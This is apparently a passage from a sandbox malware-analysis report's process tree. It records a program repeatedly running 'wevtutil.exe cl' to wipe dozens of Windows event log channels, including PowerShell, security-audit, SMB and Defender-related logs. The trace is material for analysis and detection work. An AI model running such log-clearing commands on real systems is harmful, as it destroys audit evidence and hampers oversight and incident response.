wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
3⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PmemDisk/Analytic"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PmemDisk/Diagnostic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PmemDisk/Operational"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
3⤵
PID:2924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
3⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PriResources-Deployment/Diagnostic"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PriResources-Deployment/Operational"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintDialogs/Analytic"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintDialogs3D/Analytic"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
3⤵
PID:2124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
3⤵
PID:2200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SENSE/Operational"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ScmBus/Analytic"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ScmBus/Certification"
3⤵
PID:2124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ScmBus/Diagnose"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ScmBus/Operational"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecureAssessment/Operational"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
3⤵
PID:2124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
3⤵
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
3⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:1984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
3⤵
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Search-UriHandler"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:3452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Debug"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Diagnose"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
3⤵
PID:2812

